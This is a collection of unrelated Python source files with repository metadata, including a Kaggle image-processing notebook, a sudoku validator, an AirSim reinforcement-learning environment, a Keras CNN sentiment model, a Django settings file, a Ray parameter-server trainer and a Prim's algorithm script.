print('Accuracy:', round(accuracy, 2), '%.')
# In[175]:
Y_pred_train=regr.predict(X_train)
# In[176]:
df2 = pd.DataFrame({'Actual': Y_train, 'Predicted': Y_pred_train})
df2
# In[177]:
df3 = df2.head(50)
df3.plot(kind='bar',figsize=(16,10))
plt.grid(which='major', linestyle='-', linewidth='0.5', color='green')
plt.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
plt.show()
# In[178]:
errors_train = abs(Y_pred_train - Y_train)
# In[179]:
# Display the performance metrics
print('Mean Absolute Error:', round(np.mean(errors_train), 2), 'degrees.')
mape_train = np.mean(100 * (errors_train / Y_train))
accuracy_train = 100 - mape_train
print('Accuracy:', round(accuracy_train, 2), '%.')
# In[234]:
import cv2
import os
import random
import matplotlib.pylab as plt
from glob import glob
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
# In[248]:
files_jpg = Path('D:/Kaggle/Pulmonary Fibrosis/Train_jpg1')
# In[250]:
images_jpg = glob(os.path.join(files_jpg, "*.jpg"))
# In[249]:
files_jpg
# In[252]:
images_jpg
# In[253]:
r_jpg = random.sample(images_jpg, 3)
r_jpg
# Matplotlib black magic
plt.figure(figsize=(16,16))
plt.subplot(131)
plt.imshow(cv2.imread(r_jpg[0]))
plt.subplot(132)
plt.imshow(cv2.imread(r_jpg[1]))
plt.subplot(133)
plt.imshow(cv2.imread(r_jpg[2]));
# In[255]:
def proc_images():
"""
Returns two arrays:
x is an array of resized images
"""
x = [] # images as arrays
WIDTH = 64
HEIGHT = 64
for img in images_jpg:
base = os.path.basename(images_jpg)
# Read and resize image
full_size_image = cv2.imread(images_jpg)
x.append(cv2.resize(full_size_image, (WIDTH,HEIGHT), interpolation=cv2.INTER_CUBIC))
return x
# In[261]:
from PIL import Image
# In[267]:
IMG_DIR = 'D:/Kaggle/Pulmonary Fibrosis/Train_jpg1'
for img in os.listdir(IMG_DIR):
img_array = cv2.imread(os.path.join(IMG_DIR,img), cv2.IMREAD_GRAYSCALE)
img_array = (img_array.flatten())
img_array = img_array.reshape(-1, 1).T
print(img_array)
with open('output.csv', 'ab') as f:
np.savetxt(f, img_array, delimiter=",")
# In[281]:
img_array.shape
# In[279]:
os.listdir(IMG_DIR)
# In[278]:
img
# In[ ]:
| [
"noreply@github.com"
] | noreply@github.com |
10515479aab3316ae2f634ef92fdf2aed4b5593f | 464be1d96c23380f2f4d646490928c5995d199c2 | /leet/l36.py | 431afc4e7274d4fc3a944ab25cc23ffd50b5292a | [] | no_license | TatsuLee/pythonPractice | 4c8d83fabd01b36b480c8ef1b9ff656a8d09b026 | 628c536007d131ff91f2057d863c029b2efb1bb1 | refs/heads/master | 2021-07-24T16:46:53.914031 | 2017-10-28T10:21:28 | 2017-10-28T10:21:28 | 68,804,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 890 | py | class Solution(object):
def isValidSudoku(self, board):
"""
:type board: List[List[str]]
:rtype: bool
"""
# generate 3 empty list to store scaned nums
row = [set() for i in range(9)]
col = [set() for i in range(9)]
grid = [set() for i in range(9)]
for i in range(9):
for j in range(9):
curDigit = board[i][j]
if curDigit == '.':
continue
if curDigit in row[i]:
return False
if curDigit in col[j]:
return False
k = i/3*3+j/3 # find the grid num with (i,j)
if curDigit in grid[k]:
return False
grid[k].add(curDigit)
row[i].add(curDigit)
col[j].add(curDigit)
return True
| [
"dli37@hawk.iit.edu"
] | dli37@hawk.iit.edu |
468a03cc09e3982d357c914a5bd468274a433c55 | d5466ac9513c4cf9addb01fd89b4220696352054 | /DRL/envs/airsim/airsimcarenv.py | eea010e1a42e301f1c07418e08f5c8fc8e98aa45 | [] | no_license | sanketh1691/Don-t-Crash | 99f6bb61f53751d227b31d84bd593945dde04e12 | 9edd845b750d450de0c21543c3a82d19a8571cbc | refs/heads/master | 2023-01-18T21:06:23.052387 | 2020-11-24T03:26:03 | 2020-11-24T03:26:03 | 315,507,066 | 1 | 0 | null | 2020-11-24T03:23:39 | 2020-11-24T03:23:38 | null | UTF-8 | Python | false | false | 4,790 | py | import logging
import math
import numpy as np
import random
import time
import gym
from gym import spaces
from gym.utils import seeding
from gym.spaces import Tuple, Box, Discrete, MultiDiscrete, Dict
from gym.spaces.box import Box
from envs.airsim.myAirSimCarClient import *
logger = logging.getLogger(__name__)
class AirSimCarEnv(gym.Env):
airsimClient = None
def __init__(self):
# left depth, center depth, right depth, steering
self.low = np.array([0.0, 0.0, 0.0, 0])
self.high = np.array([100.0, 100.0, 100.0, 21])
self.observation_space = spaces.Box(self.low, self.high)
self.action_space = spaces.Discrete(21)
self.state = (100, 100, 100, random.uniform(-1.0, 1.0))
self.episodeN = 0
self.stepN = 0
self.allLogs = { 'speed':[0] }
self._seed()
self.stallCount = 0
global airsimClient
airsimClient = myAirSimCarClient()
def _seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def computeReward(self, mode='roam'):
speed = self.car_state.speed
steer = self.steer
dSpeed = 0
if mode == 'roam' or mode == 'smooth':
# reward for speed
reward = speed/60
# penalize sharp steering, to discourage going in a circle
if abs(steer) >= 1.0 and speed > 100:
reward -= abs(steer) * 2
# penalize collision
if len(self.allLogs['speed']) > 0:
dSpeed = speed - self.allLogs['speed'][-2]
else:
dSpeed = 0
reward += dSpeed
# penalize for going in a loop forever
#reward -= abs(self.steerAverage) * 10
else:
reward = 1
# Placehoder. To be filled
if mode == 'smooth':
# also penalize on jerky motion, based on a fake G-sensor
steerLog = self.allLogs['steer']
g = abs(steerLog[-1] - steerLog[-2]) * 5
reward -= g
return [reward, dSpeed]
def _step(self, action):
assert self.action_space.contains(action), "%r (%s) invalid"%(action, type(action))
self.stepN += 1
steer = (action - 10)/5.0
time.sleep(0.1)
car_state = airsimClient.getCarState()
speed = car_state.speed
self.car_state = car_state
self.steer = steer
#gas = 0.45555
gas = gas = max(min(20,(speed-20)/-15),0)
airsimClient.setCarControls(gas, steer)
speed = car_state.speed
if speed < 0.5:
self.stallCount += 1
else:
self.stallCount = 0
if self.stallCount > 2:
done = True
else:
done = False
self.sensors = airsimClient.getSensorStates()
cdepth = self.sensors[1]
self.state = self.sensors
self.state.append(action)
self.addToLog('speed', speed)
self.addToLog('steer', steer)
steerLookback = 17
steerAverage = np.average(self.allLogs['steer'][-steerLookback:])
self.steerAverage = steerAverage
# Training using the Roaming mode
reward, dSpeed = self.computeReward('roam')
self.addToLog('reward', reward)
rewardSum = np.sum(self.allLogs['reward'])
# Terminate the episode on large cumulative amount penalties,
# since car probably got into an unexpected loop of some sort
if rewardSum < -1000:
done = True
sys.stdout.write("\r\x1b[K{}/{}==>reward/depth/steer/speed: {:.0f}/{:.0f} \t({:.1f}/{:.1f}/{:.1f}) \t{:.1f}/{:.1f} \t{:.2f}/{:.2f} ".format(self.episodeN, self.stepN, reward, rewardSum, self.state[0], self.state[1], self.state[2], steer, steerAverage, speed, dSpeed))
sys.stdout.flush()
# placeholder for additional logic
if done:
pass
return np.array(self.state), reward, done, {}
def addToLog (self, key, value):
if key not in self.allLogs:
self.allLogs[key] = []
self.allLogs[key].append(value)
def _reset(self):
airsimClient.reset()
airsimClient.setCarControls(1, 0)
time.sleep(0.8)
self.stepN = 0
self.stallCount = 0
self.episodeN += 1
print("")
self.allLogs = { 'speed': [0] }
# Randomize the initial steering to broaden learning
self.state = (100, 100, 100, random.uniform(0.0, 21.0))
return np.array(self.state) | [
"jaiminpa@usc.edu"
] | jaiminpa@usc.edu |
51086a37acacb82ec4da2e56fe316b05793a58d1 | 2335e7d1c10d800abb10b4432465f29a4456548d | /setup.py | 721f1b8d75682c30d9183bd741ff5d826e50db7d | [
"LicenseRef-scancode-warranty-disclaimer",
"EFL-2.0"
] | permissive | deathbybandaid/Sopel-StartupMonologue | 48a7e85ca117c630cf8039af76a0bbaea91ff5a1 | f495344cee379e66ec5022e1e7edf15f075c758c | refs/heads/master | 2020-05-09T11:18:01.564022 | 2019-04-27T14:12:38 | 2019-04-27T14:12:38 | 181,074,314 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,434 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
from setuptools import setup, find_packages
if __name__ == '__main__':
print('Sopel does not correctly load modules installed with setup.py '
'directly. Please use "pip install .", or add {}/sopel_modules to '
'core.extra in your config.'.format(
os.path.dirname(os.path.abspath(__file__))),
file=sys.stderr)
with open('README.md') as readme_file:
readme = readme_file.read()
with open('NEWS') as history_file:
history = history_file.read()
with open('requirements.txt') as requirements_file:
requirements = [req for req in requirements_file.readlines()]
with open('dev-requirements.txt') as dev_requirements_file:
dev_requirements = [req for req in dev_requirements_file.readlines()]
setup(
name='sopel_modules.startupmonologue',
version='0.1.0',
description='Sopel Startup Monologue displays to all channels that the bot is online',
long_description=readme + '\n\n' + history,
author='Sam Zick',
author_email='sam@deathbybandaid.net',
url='https://github.com/deathbybandaid/Sopel-StartupMonologue',
packages=find_packages('.'),
namespace_packages=['sopel_modules'],
include_package_data=True,
install_requires=requirements,
tests_require=dev_requirements,
test_suite='tests',
license='Eiffel Forum License, version 2',
)
| [
"sam@deathbybandaid.net"
] | sam@deathbybandaid.net |
85dedc26a7d0b18671e3606cefba8011ec6f33a6 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_156/521.py | ca8aafaec283d6e9fa857be6020a6168166a825e | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,635 | py | #!/usr/bin/python3
import sys
import math
ncases = int(sys.stdin.readline().strip())
for t in range(1, ncases+1):
d = int(sys.stdin.readline().strip())
values = sys.stdin.readline().strip().split()
pancakes = [int(x) for x in values]
pancakes.sort(reverse=True)
best = pancakes[0]
# Node format: List of diners with pancakes, number of special minutes
initial_node = [pancakes, 0]
queue = [initial_node]
while queue:
node = queue.pop(0)
diners = node[0]
special = node[1]
top = diners[0]
#if (top + special) >= best:
# continue
if (top + special) < best:
best = top + special
if top < 4:
continue
# Let's introduce new special minutes. Note _all_ diners with
# the max number of pancakes should be split (adding more special
# minuts), as splitting just one of them is stupid
for n in [2, 3, 4]:
splits = []
remainder = top
for i in range(0, n):
split = math.floor(remainder/(n-i))
remainder -= split
splits.append(split)
diners_after_special = list(diners)
new_special = special
while diners_after_special[0] == top:
diners_after_special.pop(0)
diners_after_special += splits
new_special += (n-1)
diners_after_special.sort(reverse=True)
new_node = [diners_after_special, new_special]
queue.append(new_node)
print("Case #{0}: {1}".format(t, best))
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
f21193e2e28fe1cc390d4ae97c312250c7ab7a79 | 947577e28fc58aa7505cc4da0de5ed454c7229ea | /DataStatistics/config/conf_database.py | c9f7c7a7d70b2da3783ef587323eb50427be3d7c | [] | no_license | chuxuan909/Tornado | 32064f110d49af8ff93b93ba9a8af1bb481452dc | 8946405de99dad8720c92248b9ebd06bdfe3c61f | refs/heads/master | 2020-09-05T14:08:20.462058 | 2019-11-08T09:52:40 | 2019-11-08T09:52:40 | 220,128,751 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,731 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from sqlalchemy import create_engine
#mysql连接配置
database_config={
"passwd":"xxxxxxxxx", # 数据库密码
"user":"xxx", # 数据库用户
"url":"xxx.xxx.xxx.xxx", # 数据库地址
"port":3306, # 数据库连接端口
"dbs":{'userdb1':'gHallSvrShardInfo_0','userdb2':'gHallSvrSingleInfo_0',} # mysql连接的库名称
}
#mongo连接配置
database_mongo_config ={
"passwd": "", # 数据库密码
"user": "", # 数据库用户
"url": "xxx.xxxxxx", # 数据库地址,测试
"port": "27017", # 数据库连接端口
"db":"GHall",
"collection":{"col1":"gameCoinDetail","col2":"userPut","col3":"userPutRank"}
}
#redis连接配置
database_redis_config ={
"passwd": "", # redis密码
"user": "", # redis用户
"url": "xxx.xxx.xxx.xxx", # redis地址
"port": "6379", # redis连接端口
"db":2, # redis使用的库
}
def get_arg(info):
'''
获取配置参数
:param info: key
:return: 配置参数
'''
try:
return database_config[info]
except KeyError:
return None
def get_mongo_arg(info):
'''
获取配置参数
:param info: key
:return: 配置参数
'''
try:
return database_mongo_config[info]
except KeyError:
return None
def get_redis_arg(info):
'''
获取配置参数
:param info: key
:return: 配置参数
'''
try:
return database_redis_config[info]
except KeyError:
return None
def test_db():
'''
尝试连接数据库
:return:
'''
for value in get_arg('dbs').values():
engine = create_engine('mysql+pymysql://%s:%s@%s:%d/%s' % (
get_arg('user'), get_arg('passwd'), get_arg('url'), get_arg('port'), value), max_overflow=15,
echo=False)
try:
dbs_name=engine.execute('show databases')
if dbs_name:
print("连接 >>%s:%d<< MySql数据库 [[%s]] 成功" % (get_arg('url'),get_arg('port'),value))
dbs_name.close()
except Exception as err:
print("数据库连接失败... 请检查连接配置和数据库服务器配置")
print(err)
if __name__ == "__main__":
print('数据库地址 : %s ' % get_arg('url'))
print('数据库连接端口 %d' % get_arg('port'))
for index in get_arg('dbs').keys():
print('连接的数据库 %s 名称为 : %s' % (index, get_arg('dbs')[index]))
raw=input("是否测试数据库连接? [Y/N]\t")
if raw == "Y" or raw == "y":
test_db()
else:
pass
| [
"305958872@qq.com"
] | 305958872@qq.com |
a4bc6700762042ba729d57d355527709795f6f6f | a19068d77efe49808ea54a2cdb1f64036248fbee | /experiments/CNN_BasicExpmnt.py | 61e841bdc706f2ff930a4c5325f94355a6b8fb27 | [] | no_license | sarneetk/NLP-Project | 6facb81a9307684f90c237192fcc824534dbfff5 | e5c483a763d5818365f8280292ac586638ba10ee | refs/heads/master | 2023-03-25T21:04:20.632517 | 2021-03-21T04:19:01 | 2021-03-21T04:19:01 | 344,712,064 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,309 | py | # CNN for the IMDB problem
from tensorflow import keras
from keras.datasets import imdb
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Flatten
from keras.layers.convolutional import Conv1D
from keras.layers.convolutional import MaxPooling1D
from keras.layers.embeddings import Embedding
from keras.preprocessing import sequence
from keras import backend as K
import matplotlib.pyplot as plt
plt.style.use('ggplot')
def plot_graph(history) :
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
loss = history.history['loss']
val_loss = history.history['val_loss']
x = range(1, len(acc) + 1)
plt.figure(figsize=(12, 5))
plt.subplot(1, 2, 1)
plt.plot(x, acc, 'b', label='Training acc')
plt.plot(x, val_acc, 'r', label='Validation acc')
plt.title('Training and validation accuracy')
plt.legend()
plt.subplot(1, 2, 2)
plt.plot(x, loss, 'b', label='Training loss')
plt.plot(x, val_loss, 'r', label='Validation loss')
plt.title('Training and validation loss')
plt.legend()
plt.show()
def recall(y_true, y_pred):
y_true = K.ones_like(y_true)
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
all_positives = K.sum(K.round(K.clip(y_true, 0, 1)))
if (true_positives!=0):
recall0 = true_positives / (all_positives + K.epsilon())
else:
recall0=0.0
return recall0
def precision(y_true, y_pred):
y_true = K.ones_like(y_true)
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))
if(true_positives!=0):
precision0 = true_positives / (predicted_positives + K.epsilon())
else:
precision0=0.0
return precision0
def f1_score(y_true, y_pred):
precision1 = precision(y_true, y_pred)
recall1 = recall(y_true, y_pred)
return 2* ((precision1 * recall1) / (precision1 + recall1 + K.epsilon()))
if __name__ == '__main__':
# load the dataset but only keep the top 5000 words, zero the rest
top_words = 5000
(X_train, y_train), (X_test, y_test) = imdb.load_data(num_words=top_words)
# pad dataset to a maximum review length in words
max_words = 500
X_train = sequence.pad_sequences(X_train, maxlen=max_words)
X_test = sequence.pad_sequences(X_test, maxlen=max_words)
# Define CNN Model
# first layer is the Embedded layer that uses 32 length vectors to represent each word.
# The next layer is the one dimensional CNN layer .
# Finally, because this is a classification problem we use a Dense output layer with a single neuron and
# a sigmoid activation function to make 0 or 1 predictions for the two classes (good and bad) in the problem.
embedding_vector_length = 32
model = Sequential()
model.add(Embedding(top_words, embedding_vector_length, input_length=max_words))
model.add(Conv1D(32, 3, padding='same', activation='relu'))
model.add(MaxPooling1D())
model.add(Flatten())
model.add(Dense(250, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy',f1_score, precision, recall])
model.summary()
# Fit the model
history=model.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=3, batch_size=128, verbose=2)
# Evaluation of the model with training data
scores_train = model.evaluate(X_train, y_train, verbose=0)
print("Training Data: ")
print("Accuracy: %.2f%%, F_1Score: %.2f%% , Precision: %.2f%%, Recall: %.2f%% " % (scores_train[1]*100,scores_train[2]*100,
scores_train[3]*100,scores_train[4]*100))
# Evaluation of the model with test data
scores = model.evaluate(X_test, y_test, verbose=0)
print("Test Data:")
print("Accuracy: %.2f%%, F_1Score: %.2f%% , Precision: %.2f%%, Recall: %.2f%%" % (scores[1] * 100,scores[2] * 100 ,
scores[3] * 100,scores[4] * 100))
# Plotting the graph
plot_graph(history) | [
"noreply@github.com"
] | noreply@github.com |
8de417f20989172bfac0cbb257285314d44a4cb5 | 09d81c119fb88b73c0968e6d384898ec1a65bb36 | /lab5/lab5/settings.py | 7990e2f20bbb476fd206cc294ebb34cc91767911 | [] | no_license | n10florin/nfir1917 | 8a92f5c3c32aecdaf56114ed205edbefa8f66902 | 11aca585d9b4d3bd17cd7fe8136967c2effe4c68 | refs/heads/master | 2021-04-12T09:54:08.639211 | 2018-05-17T11:28:46 | 2018-05-17T11:28:46 | 126,162,496 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,154 | py | """
Django settings for lab5 project.
Generated by 'django-admin startproject' using Django 2.0.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'r3()ve1_7+x%9)(t5(%q19!=fqs9e3s$+0h#9d+$=^y2wtg-6$'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'note.apps.NoteConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'lab5.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'lab5.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
| [
"n10florin@gmail.com"
] | n10florin@gmail.com |
5cb33ac9f43d4cdcb1e19f70d4624b4fa4b74cb0 | 6a7cf44a3cdce674bd0659f81f830826caac34e1 | /Lessons/lol.py | 0c454d9399717a381f486f94fb7b1c9387163d25 | [] | no_license | Ethansu/Random-Python | 9f1b6198968091cd3f356ad2962d0efdc455c76a | 4b1b18e1cb6c04f1195082c5d0899f476e234a55 | refs/heads/master | 2021-05-06T02:10:18.163866 | 2017-12-17T00:53:14 | 2017-12-17T00:53:14 | 114,498,985 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 79 | py | #import unittest
#from homework_6 import Car
def lol(x):
return (x + 1) / 4 | [
"jingchunsumacc@gmail.com"
] | jingchunsumacc@gmail.com |
01963dfede8f5f05b7ffa0c3d4400f87db8be7ca | eae1829b4a629571a9e3821760cf6c7e2547b300 | /cifar_asgd_new.py | dfb193cce4191c71d4b11ca0ad712fe51cb6f42a | [] | no_license | zdpau/Sync-Async_PS | 1b3131a3a7d135bb3d62896ca3dd74ba6d18aa30 | 86a1c71960b70d86cad9c6f97a8a3932a1cb79ff | refs/heads/master | 2021-07-21T10:16:34.547532 | 2018-12-19T09:29:39 | 2018-12-19T09:29:39 | 140,381,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,144 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import ray
import tensorflow as tf
import cifar10
import cifar10_train
import time
from collections import deque
import random
import sys
numLoops = 5000
FLAGS = tf.app.flags.FLAGS
# tf.app.flags.DEFINE_string('param_name', 'default_val, 'description')
tf.app.flags.DEFINE_string('train_dir', 'cifar10_train',
"""Directory where to write event logs """
"""and checkpoint.""")
tf.app.flags.DEFINE_integer('max_steps', 1000000,
"""Number of batches to run.""")
tf.app.flags.DEFINE_integer('log_frequency', 10,
"""How often to log results to the console.""")
tf.app.flags.DEFINE_integer('num_examples', 10000,
"""Number of examples to run.""")
tf.app.flags.DEFINE_integer('num_nodes', 1,
"""Number of nodes.""")
tf.app.flags.DEFINE_float('delay', 0, """delay""")
tf.app.flags.DEFINE_boolean('sync', False, """synchronous mode""")
tf.app.flags.DEFINE_boolean('serial', False, """serial mode""")
def t():
return time.time()
@ray.remote
class ParameterServer(object):
def __init__(self, keys, values, num_nodes):
self.grad_buf = deque()
values = [value.copy() for value in values]
self.weights = dict(zip(keys, values))
self.num_nodes = num_nodes
def push(self, keys, values):
# print (a)
timeline = (t(), keys, values)
#print(timeline)
self.grad_buf.append(timeline)
# print (grad_buf)
def update(self, keys, values):
for key, value in zip(keys, values):
self.weights[key] += value / self.num_nodes
def pull(self, keys):
tau0 = t()
while len(self.grad_buf) > 0:
if self.grad_buf[0][0] < tau0 - FLAGS.delay:
entry = self.grad_buf.popleft()
self.update(entry[1], entry[2])
else:
break
return [self.weights[key] for key in keys]
@ray.remote
class Worker(object):
def __init__(self, ps, num, zero):
self.net = cifar10_train.Train()
self.keys = self.net.get_weights()[0]
self.zero = zero
self.num = num
self.ps = ps
self.counter = 0
self.indexes = list(range(len(self.net.images)))
random.shuffle(self.indexes)
weights = ray.get(self.ps.pull.remote(self.keys))
self.net.set_weights(self.keys, weights)
self.addr = ray.services.get_node_ip_address()
def execOne(self, c):
index = self.indexes[c % len(self.net.images)]
im = self.net.images[index]
lb = self.net.labels[index]
gradients = self.net.compute_update(im,lb)
print ("LOSS {} {} {:.6f} {}".format(self.num, c, time.time() - self.zero, self.net.lossval))
sys.stdout.flush()
return gradients
def computeOneCycle(self):
weights = ray.get(self.ps.pull.remote(self.keys))
self.net.set_weights(self.keys, weights)
gradients = self.execOne(self.counter)
self.counter += 1
self.ps.push.remote(self.keys, gradients)
return 1 # dummy to sync
def go(self, times, independent=False):
for c in range(times):
if independent:
self.execOne(c)
else:
self.computeOneCycle()
return 1
def get_addr(self):
return self.addr
def createWorkers(num_workers, ps, zero):
''' create one worker per one node '''
hosts = []
workers = []
counter = 0
while counter < num_workers:
worker = Worker.remote(ps, counter, zero)
addr = ray.get(worker.get_addr.remote())
if addr in hosts:
''' throw away worker '''
continue
workers.append(worker)
hosts.append(addr)
counter += 1
return workers
def main(argv=None):
# tf.app.flags.FLAGS._parse_flags(sys.argv)
# cifar10.maybe_download_and_extract()
if tf.gfile.Exists(FLAGS.train_dir):
tf.gfile.DeleteRecursively(FLAGS.train_dir)
tf.gfile.MakeDirs(FLAGS.train_dir)
ray.init(num_gpus=2)
net = cifar10_train.Train()
all_keys, all_values = net.get_weights()
ps = ParameterServer.remote(all_keys, all_values, FLAGS.num_nodes)
zero = time.time()
# workers = [Worker.remote(ps, n, zero) for n in range(FLAGS.num_nodes)]
workers = createWorkers(FLAGS.num_nodes, ps, zero)
global numLoops
numLoops = (int)(numLoops / FLAGS.num_nodes)
if FLAGS.sync:
print("SYNC mode")
for _ in range(numLoops):
ray.get([w.computeOneCycle.remote() for w in workers])
elif FLAGS.serial:
print("SERIAL mode")
_ = ray.get(workers[0].go.remote(numLoops, independent=True))
else:
print("ASYNC mode")
_ = ray.get([w.go.remote(numLoops, independent=False) for w in workers])
if __name__ == '__main__':
tf.app.run()
| [
"noreply@github.com"
] | noreply@github.com |
c0c5bf3b9e293f9e815bdb6e73677906bd3d0e31 | fad2c9d62fbc48230af447c980e641626c86c1d5 | /users/apps.py | 1231bc80c02815a3287789710efca12d72d86056 | [] | no_license | marcoapr/django-lab | 65a50d9736d52fddcf84cdf47c3b84f918e5b1d7 | 35856afa988ac619643919b50a11d8de2bfba856 | refs/heads/master | 2020-04-02T20:06:57.508267 | 2018-10-26T01:22:54 | 2018-10-26T01:22:54 | 154,758,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 173 | py | """ User app configuration. """
from django.apps import AppConfig
class UsersConfig(AppConfig):
""" User app config """
name = 'users'
verbose_name = 'Users'
| [
"mperez@unitedvirtualities.com"
] | mperez@unitedvirtualities.com |
2354d06939d6c72e5399a441a3e3c362fe7451e0 | 65e2f1f1daaaf175b09d0863f6ed77c77129fed6 | /c/personal/algo_007/programming_assignments/algo_002/1/prim/prim_bkp.py | a4a4efd5fb5b32000cb176f21d8e90f7d077059b | [] | no_license | ausanyal/code | 86b010613eb5b9dc0ada717e0db8e21f4ede8961 | a359f9cfb650d57ce88c39dc0e15dce19a5324bd | refs/heads/master | 2021-01-01T15:39:34.985446 | 2018-05-07T01:47:02 | 2018-05-07T01:47:02 | 97,669,433 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,539 | py | #!/usr/bin/python
import sys
import collections
from decimal import Decimal
f = open('input', 'r')
lines = f.readlines()
nv = 0
ne = 0
d = {}
for line in lines:
if ne == 0:
nv,ne = line.split(' ')
else:
u,v,e = map(int, line.split(' '))
if u not in d.keys():
d[u] = {}
d[u]['ud'] = {}
if e not in d[u]['ud'].keys():
d[u]['ud'][e] = []
d[u]['ud'][e].append(v)
d[u]['od'] = collections.OrderedDict(sorted(d[u]['ud'].items()))
def find_smallest_cut(pd):
le_key = Decimal('Infinity')
ct = 0
# we need to explore a new edge per iter
# v cannot point to an existing vertex already explored
for u in pd.keys():
if u == 500:
continue
if u not in d.keys():
#print "u: ", 6, "not in keys"
continue
for e in d[u]['od'].keys():
for v in d[u]['od'][e]:
if v in pd.keys():
#print "v", v, "for u", u, "in pd.keys", pd.keys()
del d[u]['od'][e]
ct = ct + 1
le_u = None
for u in pd.keys():
if u == 500:
continue
if u not in d.keys():
#print "u: ", 6, "not in keys"
continue
if len(d[u]['od'].keys()) > 0:
#print "1. u: ", u, "pd.keys: ", pd.keys(), "d[u]['od'].keys()[0] : ", d[u]['od'].keys()[0]
if d[u]['od'].keys()[0] < le_key:
le_u = u
le_key = d[le_u]['od'].keys()[0]
if le_u is not None:
v = d[le_u]['od'][le_key][0]
#print "3. ", le_key, "u: ", le_u, "v: ", v
return le_u, v, le_key
else:
print "(((((((((((((((((((((((((( ERROR ))))))))))))))))))))))))))", ct
return 0, 0, 0
i = 1
count = 0
w = 0
pd = {}
# add i to pd
#print "************* Adding ", i, "to pd ", pd.keys()
pd[i] = []
while (count < nv):
u, v, le_key = find_smallest_cut(pd)
pd[u] = [ v, le_key ]
if v not in pd.keys() and (v != 0):
# add v to pd
pd[v] = []
w = w + le_key
print "************* Adding ", u, "-", v, "to pd ", pd.keys(), "e: ", le_key, "w: ", w
#del d[u]['od'][le_key]
count = count + 1
#print "7: ", u, v, le_key, " pd.keys: ", pd.keys(), "count: ", count, "w: ", w, "len: ", len(pd.keys())
if len(pd.keys()) == int(nv):
print "Done"
break
'''
def find_smallest_cut(pd):
le_key = Decimal('Infinity')
for u in pd.keys():
print "1. u: ", u, "pd.keys: ", pd.keys()
#print "2. ", d[u]
if d[u]['od'].keys()[0] < le_key:
le_u = u
le_key = d[le_u]['od'].keys()[0]
# for this le get first v from the list of (u, v1) or (u, v2) ...
v = d[le_u]['od'][le_key][0]
# we need to explore a new edge per iter
# v cannot point to an existing vertex already explored
if v in pd.keys():
print "2: v: ", v, "is in pd.keys"
del d[le_u]['od'][le_key]
